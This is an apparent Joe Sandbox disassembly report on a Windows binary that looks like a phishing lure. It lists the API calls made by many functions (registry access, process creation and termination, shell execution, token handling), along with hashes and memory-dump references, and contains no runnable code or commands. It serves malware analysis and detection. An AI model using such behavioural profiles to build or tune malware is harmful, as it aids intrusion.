                                                      • Opcode Fuzzy Hash: 43d2c8f0909bc2fea7355d60be483dffc446192d0f0d5cf2b03aaac85288813e
                                                      • Instruction Fuzzy Hash: 5851D372620217ABEB258FA4DC89EEF77A9EB44B90F144669FC05D6140DB38DC64CA60
                                                      APIs
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                        • Part of subcall function 0030C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0030B6AE,?,?), ref: 0030C9B5
                                                        • Part of subcall function 0030C998: _wcslen.LIBCMT ref: 0030C9F1
                                                        • Part of subcall function 0030C998: _wcslen.LIBCMT ref: 0030CA68
                                                        • Part of subcall function 0030C998: _wcslen.LIBCMT ref: 0030CA9E
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0030BCCA
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0030BD25
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0030BD6A
                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0030BD99
                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0030BDF3
                                                      • RegCloseKey.ADVAPI32(?), ref: 0030BDFF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                      • String ID:
                                                      • API String ID: 1120388591-0
                                                      • Opcode ID: 100c379eb7f27eaf7d11b176807644ece903ba590f3e9424fa98248b6749263a
                                                      • Instruction ID: e4adcbddc24da45a69de7caa12b7e1a153024c69ca6f3d497daa3ea92d67e694
                                                      • Opcode Fuzzy Hash: 100c379eb7f27eaf7d11b176807644ece903ba590f3e9424fa98248b6749263a
                                                      • Instruction Fuzzy Hash: FE81BE30219241AFD715EF24C891E2AFBE9FF84308F14855DF4598B2A2DB31ED45CB92
                                                      APIs
                                                      • VariantInit.OLEAUT32(00000035), ref: 002DF7B9
                                                      • SysAllocString.OLEAUT32(00000001), ref: 002DF860
                                                      • VariantCopy.OLEAUT32(002DFA64,00000000), ref: 002DF889
                                                      • VariantClear.OLEAUT32(002DFA64), ref: 002DF8AD
                                                      • VariantCopy.OLEAUT32(002DFA64,00000000), ref: 002DF8B1
                                                      • VariantClear.OLEAUT32(?), ref: 002DF8BB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                      • String ID:
                                                      • API String ID: 3859894641-0
                                                      • Opcode ID: 407f9c0c724091e0a094cf6f8173802fbaea45dbbe63d1f67bac3da067701a93
                                                      • Instruction ID: be8f5fdd4ccafb5f48c55f64f12fd00d18875c25b6c644a2014c94e2ce5ee43f
                                                      • Opcode Fuzzy Hash: 407f9c0c724091e0a094cf6f8173802fbaea45dbbe63d1f67bac3da067701a93
                                                      • Instruction Fuzzy Hash: 74510535974310AACF90AF65D9A5769B3A8EF45310F209467EC07DF391DB708C60CB9A
                                                      APIs
                                                        • Part of subcall function 00287620: _wcslen.LIBCMT ref: 00287625
                                                        • Part of subcall function 00286B57: _wcslen.LIBCMT ref: 00286B6A
                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 002F94E5
                                                      • _wcslen.LIBCMT ref: 002F9506
                                                      • _wcslen.LIBCMT ref: 002F952D
                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 002F9585
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$FileName$OpenSave
                                                      • String ID: X
                                                      • API String ID: 83654149-3081909835
                                                      • Opcode ID: c409bd4c1f9bc399d8342638f5b50946ef0499c68ef94cd0c23fdd8a7cead85a
                                                      • Instruction ID: e2bd9dda648dec8a622738708230e0a53687c3e2a4d99ea4bc3e43bed2fd09fd
                                                      • Opcode Fuzzy Hash: c409bd4c1f9bc399d8342638f5b50946ef0499c68ef94cd0c23fdd8a7cead85a
                                                      • Instruction Fuzzy Hash: B2E1E1355283018FD724EF24C881B6AB7E4BF85350F04896DF9899B2A2DB30DD55CF92
                                                      APIs
                                                        • Part of subcall function 00299BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00299BB2
                                                      • BeginPaint.USER32(?,?,?), ref: 00299241
                                                      • GetWindowRect.USER32(?,?), ref: 002992A5
                                                      • ScreenToClient.USER32(?,?), ref: 002992C2
                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 002992D3
                                                      • EndPaint.USER32(?,?,?,?,?), ref: 00299321
                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 002D71EA
                                                        • Part of subcall function 00299339: BeginPath.GDI32(00000000), ref: 00299357
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                      • String ID:
                                                      • API String ID: 3050599898-0
                                                      • Opcode ID: fc1b57b87550fe8e4f96ab5e54240814736d747e43d81d91b3e167459cb4731c
                                                      • Instruction ID: cc2c3a05a8b83011d2a0576a9313d22cd366ff6047f36d70b823d0ee0fe4bae5
                                                      • Opcode Fuzzy Hash: fc1b57b87550fe8e4f96ab5e54240814736d747e43d81d91b3e167459cb4731c
                                                      • Instruction Fuzzy Hash: 3E41B271124301AFDB12DF28CC84FAA7BA8EB4A331F04026DF955872B1D7709C95DBA1
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 002F080C
                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 002F0847
                                                      • EnterCriticalSection.KERNEL32(?), ref: 002F0863
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 002F08DC
                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 002F08F3
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 002F0921
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 3368777196-0
                                                      • Opcode ID: 20393da4a80f646a25ff6082ca07df0c2b6ff4ba99981af3ca34b71e6eee0e60
                                                      • Instruction ID: 8ca095f39503aa3758ec59a159da489d2eddfa7ef7f0cd474942e554388ecac5
                                                      • Opcode Fuzzy Hash: 20393da4a80f646a25ff6082ca07df0c2b6ff4ba99981af3ca34b71e6eee0e60
                                                      • Instruction Fuzzy Hash: 90418A31A10209EBDF15AF54DC85AAAB7B8FF08700F1480B5ED009A297DB30DE65DBA0
                                                      APIs
                                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,002DF3AB,00000000,?,?,00000000,?,002D682C,00000004,00000000,00000000), ref: 0031824C
                                                      • EnableWindow.USER32(00000000,00000000), ref: 00318272
                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 003182D1
                                                      • ShowWindow.USER32(00000000,00000004), ref: 003182E5
                                                      • EnableWindow.USER32(00000000,00000001), ref: 0031830B
                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0031832F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$Show$Enable$MessageSend
                                                      • String ID:
                                                      • API String ID: 642888154-0
                                                      • Opcode ID: 84148b7719aa9982a19b6951efab152b31f608029d708fe012bbb9acb7947d37
                                                      • Instruction ID: 3a0ece3b45bb9d17828d683ee94c14d125e12024aec1cad3796e0d87c0b4995d
                                                      • Opcode Fuzzy Hash: 84148b7719aa9982a19b6951efab152b31f608029d708fe012bbb9acb7947d37
                                                      • Instruction Fuzzy Hash: 6541D438601640AFDB2BCF14C899BE47BF4BB0E715F195568E5184F2B2CB71AC82CB44
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 002E4C95
                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 002E4CB2
                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 002E4CEA
                                                      • _wcslen.LIBCMT ref: 002E4D08
                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 002E4D10
                                                      • _wcsstr.LIBVCRUNTIME ref: 002E4D1A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                      • String ID:
                                                      • API String ID: 72514467-0
                                                      • Opcode ID: 48ff2eb05f9479c9b72a1c7d2fed405954f06399252bdaaa436fb79e9a7c551f
                                                      • Instruction ID: ba182f6bac8eb6b80556a12413522b32cf7c67fd19d5cef018e7af6acbfe3878
                                                      • Opcode Fuzzy Hash: 48ff2eb05f9479c9b72a1c7d2fed405954f06399252bdaaa436fb79e9a7c551f
                                                      • Instruction Fuzzy Hash: 54210B31264241BBEB156F3ADC49E7B7B9CDF49750F54803AF805CB192DE61DC6096A0
                                                      APIs
                                                        • Part of subcall function 00283AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00283A97,?,?,00282E7F,?,?,?,00000000), ref: 00283AC2
                                                      • _wcslen.LIBCMT ref: 002F587B
                                                      • CoInitialize.OLE32(00000000), ref: 002F5995
                                                      • CoCreateInstance.OLE32(0031FCF8,00000000,00000001,0031FB68,?), ref: 002F59AE
                                                      • CoUninitialize.OLE32 ref: 002F59CC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                      • String ID: .lnk
                                                      • API String ID: 3172280962-24824748
                                                      • Opcode ID: d865a7187a5fadca1e5ffd92330f3c5dc20b17c30b8d32789dcb3eda434d1eab
                                                      • Instruction ID: 22f4b0da1cea4131be359603d4226d6da49f2e1c40cdefb833e1e862a44653c2
                                                      • Opcode Fuzzy Hash: d865a7187a5fadca1e5ffd92330f3c5dc20b17c30b8d32789dcb3eda434d1eab
                                                      • Instruction Fuzzy Hash: 45D174746146159FC704EF24C48092ABBE1FF89754F14886DFA8A9B361CB31EC55CF92
                                                      APIs
                                                        • Part of subcall function 002E0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002E0FCA
                                                        • Part of subcall function 002E0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002E0FD6
                                                        • Part of subcall function 002E0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002E0FE5
                                                        • Part of subcall function 002E0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002E0FEC
                                                        • Part of subcall function 002E0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002E1002
                                                      • GetLengthSid.ADVAPI32(?,00000000,002E1335), ref: 002E17AE
                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 002E17BA
                                                      • HeapAlloc.KERNEL32(00000000), ref: 002E17C1
                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 002E17DA
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,002E1335), ref: 002E17EE
                                                      • HeapFree.KERNEL32(00000000), ref: 002E17F5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                      • String ID:
                                                      • API String ID: 3008561057-0
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002E14FF
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 002E1506
                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 002E1515
                                                      • CloseHandle.KERNEL32(00000004), ref: 002E1520
                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002E154F
                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 002E1563
                                                      Similarity
                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                      • String ID:
                                                      • API String ID: 1413079979-0
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,002A3379,002A2FE5), ref: 002A3390
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002A339E
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002A33B7
                                                      • SetLastError.KERNEL32(00000000,?,002A3379,002A2FE5), ref: 002A3409
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,002B5686,002C3CD6,?,00000000,?,002B5B6A,?,?,?,?,?,002AE6D1,?,00348A48), ref: 002B2D78
                                                      • _free.LIBCMT ref: 002B2DAB
                                                      • _free.LIBCMT ref: 002B2DD3
                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,002AE6D1,?,00348A48,00000010,00284F4A,?,?,00000000,002C3CD6), ref: 002B2DE0
                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,002AE6D1,?,00348A48,00000010,00284F4A,?,?,00000000,002C3CD6), ref: 002B2DEC
                                                      • _abort.LIBCMT ref: 002B2DF2
                                                      Similarity
                                                      • API ID: ErrorLast$_free$_abort
                                                      • String ID:
                                                      • API String ID: 3160817290-0
                                                      APIs
                                                        • Part of subcall function 00299639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00299693
                                                        • Part of subcall function 00299639: SelectObject.GDI32(?,00000000), ref: 002996A2
                                                        • Part of subcall function 00299639: BeginPath.GDI32(?), ref: 002996B9
                                                        • Part of subcall function 00299639: SelectObject.GDI32(?,00000000), ref: 002996E2
                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00318A4E
                                                      • LineTo.GDI32(?,00000003,00000000), ref: 00318A62
                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00318A70
                                                      • LineTo.GDI32(?,00000000,00000003), ref: 00318A80
                                                      • EndPath.GDI32(?), ref: 00318A90
                                                      • StrokePath.GDI32(?), ref: 00318AA0
                                                      Similarity
                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                      • String ID:
                                                      • API String ID: 43455801-0
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 002E5218
                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 002E5229
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002E5230
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 002E5238
                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 002E524F
                                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 002E5261
                                                      Similarity
                                                      • API ID: CapsDevice$Release
                                                      • String ID:
                                                      • API String ID: 1035833867-0
                                                      APIs
                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00281BF4
                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00281BFC
                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00281C07
                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00281C12
                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00281C1A
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00281C22
                                                      Similarity
                                                      • API ID: Virtual
                                                      • String ID:
                                                      • API String ID: 4278518827-0
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 002EEB30
                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 002EEB46
                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 002EEB55
                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002EEB64
                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002EEB6E
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002EEB75
                                                      Similarity
                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 839392675-0
                                                      APIs
                                                      • GetClientRect.USER32(?), ref: 002D7452
                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 002D7469
                                                      • GetWindowDC.USER32(?), ref: 002D7475
                                                      • GetPixel.GDI32(00000000,?,?), ref: 002D7484
                                                      • ReleaseDC.USER32(?,00000000), ref: 002D7496
                                                      • GetSysColor.USER32(00000005), ref: 002D74B0
                                                      Similarity
                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                      • String ID:
                                                      • API String ID: 272304278-0
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002E187F
                                                      • UnloadUserProfile.USERENV(?,?), ref: 002E188B
                                                      • CloseHandle.KERNEL32(?), ref: 002E1894
                                                      • CloseHandle.KERNEL32(?), ref: 002E189C
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 002E18A5
                                                      • HeapFree.KERNEL32(00000000), ref: 002E18AC
                                                      Similarity
                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                      • String ID:
                                                      • API String ID: 146765662-0
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 0028BEB3
                                                      Strings
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID: D%5$D%5$D%5$D%5D%5
                                                      • API String ID: 1385522511-4083595773
                                                      APIs
                                                        • Part of subcall function 002A0242: EnterCriticalSection.KERNEL32(0035070C,00351884,?,?,0029198B,00352518,?,?,?,002812F9,00000000), ref: 002A024D
                                                        • Part of subcall function 002A0242: LeaveCriticalSection.KERNEL32(0035070C,?,0029198B,00352518,?,?,?,002812F9,00000000), ref: 002A028A
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                        • Part of subcall function 002A00A3: __onexit.LIBCMT ref: 002A00A9
                                                      • __Init_thread_footer.LIBCMT ref: 00307BFB
                                                        • Part of subcall function 002A01F8: EnterCriticalSection.KERNEL32(0035070C,?,?,00298747,00352514), ref: 002A0202
                                                        • Part of subcall function 002A01F8: LeaveCriticalSection.KERNEL32(0035070C,?,00298747,00352514), ref: 002A0235
                                                      Strings
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                      • String ID: +T-$5$G$Variable must be of type 'Object'.
                                                      • API String ID: 535116098-4161847683
                                                      • Opcode ID: 29263c30720190270720092becbf7c5c473dd22fdce7a42bb192fc02240905b0
                                                      • Instruction ID: 958c711d493bd297b141619b8af077acfae9d528f4a3136e4e257df7c9ded41b
                                                      • Opcode Fuzzy Hash: 29263c30720190270720092becbf7c5c473dd22fdce7a42bb192fc02240905b0
                                                      • Instruction Fuzzy Hash: 44919C74A06209AFCB16EF54D8A0DAEB7B5BF49300F108059F8069B291DB31AE55CB50
                                                      APIs
                                                        • Part of subcall function 00287620: _wcslen.LIBCMT ref: 00287625
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002EC6EE
                                                      • _wcslen.LIBCMT ref: 002EC735
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002EC79C
                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 002EC7CA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info_wcslen$Default
                                                      • String ID: 0
                                                      • API String ID: 1227352736-4108050209
                                                      • Opcode ID: 7e0e64b991813e10b68674609b2d2de6d24a60318b9908b68877d9096541d932
                                                      • Instruction ID: 2240f28049d4d5bc6bffbdc9761817dddd08bed21d40347399b00e3fe5c510c3
                                                      • Opcode Fuzzy Hash: 7e0e64b991813e10b68674609b2d2de6d24a60318b9908b68877d9096541d932
                                                      • Instruction Fuzzy Hash: E45105716B43825BD7519FAAC844B6BB7ECAF86310F640929F991D31E0DB70CC258F52
                                                      APIs
                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 0030AEA3
                                                        • Part of subcall function 00287620: _wcslen.LIBCMT ref: 00287625
                                                      • GetProcessId.KERNEL32(00000000), ref: 0030AF38
                                                      • CloseHandle.KERNEL32(00000000), ref: 0030AF67
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CloseExecuteHandleProcessShell_wcslen
                                                      • String ID: <$@
                                                      • API String ID: 146682121-1426351568
                                                      • Opcode ID: 66a2b9415551bfb484dbf7d521af69c930eec769ad8e3c6ba6a1d345f16bfb01
                                                      • Instruction ID: 7c53a2b7e0cb1a3be82e505630aff101d5fe18b41a9cafb7ee266e66e7c137c9
                                                      • Opcode Fuzzy Hash: 66a2b9415551bfb484dbf7d521af69c930eec769ad8e3c6ba6a1d345f16bfb01
                                                      • Instruction Fuzzy Hash: C1719774A11619CFCB15EF64D494A9EBBF0BF08300F148499E816AB7A2CB34ED51CFA1
                                                      APIs
                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 002E7206
                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 002E723C
